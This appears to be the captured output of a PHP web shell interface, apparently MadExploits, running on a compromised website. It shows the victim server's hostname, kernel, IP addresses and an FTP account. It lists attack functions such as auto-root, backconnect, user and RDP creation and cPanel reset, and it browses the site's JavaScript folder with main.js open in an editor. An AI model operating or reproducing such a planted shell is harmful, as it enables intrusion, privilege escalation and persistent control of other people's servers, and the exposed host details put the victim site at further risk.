Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
master /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
cors
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
bootstrap-image-gallery.min.js
6.07
KB
-rw-r--r--
bootstrap.min.js
26.99
KB
-rw-r--r--
canvas-to-blob.min.js
1.01
KB
-rw-r--r--
jquery.fileupload-fp.js
8.55
KB
-rw-r--r--
jquery.fileupload-ui.js
31.84
KB
-rw-r--r--
jquery.fileupload.js
52.21
KB
-rw-r--r--
jquery.iframe-transport.js
8.69
KB
-rw-r--r--
jquery.min.js
90.46
KB
-rw-r--r--
load-image.min.js
3.13
KB
-rw-r--r--
main.js
2.48
KB
-rw-r--r--
tmpl.min.js
971
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
/* * jQuery File Upload Plugin JS Example 7.0 * https://github.com/blueimp/jQuery-File-Upload * * Copyright 2010, Sebastian Tschan * https://blueimp.net * * Licensed under the MIT license: * http://www.opensource.org/licenses/MIT */ /*jslint nomen: true, unparam: true, regexp: true */ /*global $, window, document */ $(function () { 'use strict'; // Initialize the jQuery File Upload widget: $('#fileupload').fileupload({ // Uncomment the following to send cross-domain cookies: //xhrFields: {withCredentials: true}, url: 'server/php/' }); alert(url); // Enable iframe cross-domain access via redirect option: $('#fileupload').fileupload( 'option', 'redirect', window.location.href.replace( /\/[^\/]*$/, '/cors/result.html?%s' ) ); if (window.location.hostname === 'blueimp.github.com') { // Demo settings: $('#fileupload').fileupload('option', { url: '//jquery-file-upload.appspot.com/', maxFileSize: 5000000, acceptFileTypes: /(\.|\/)(gif|jpe?g|png)$/i, process: [ { action: 'load', fileTypes: /^image\/(gif|jpeg|png)$/, maxFileSize: 20000000 // 20MB }, { action: 'resize', maxWidth: 1440, maxHeight: 900 }, { action: 'save' } ] }); // Upload server status check for browsers with CORS support: if ($.support.cors) { $.ajax({ url: '//jquery-file-upload.appspot.com/', type: 'HEAD' }).fail(function () { $('<span class="alert alert-error"/>') .text('Upload server currently unavailable - ' + new Date()) .appendTo('#fileupload'); }); } } else { // Load existing files: $.ajax({ // Uncomment the following to send cross-domain cookies: //xhrFields: {withCredentials: true}, url: $('#fileupload').fileupload('option', 'url'), dataType: 'json', context: $('#fileupload')[0] }).done(function (result) { $(this).fileupload('option', 'done') .call(this, null, {result: result}); }); } });
Close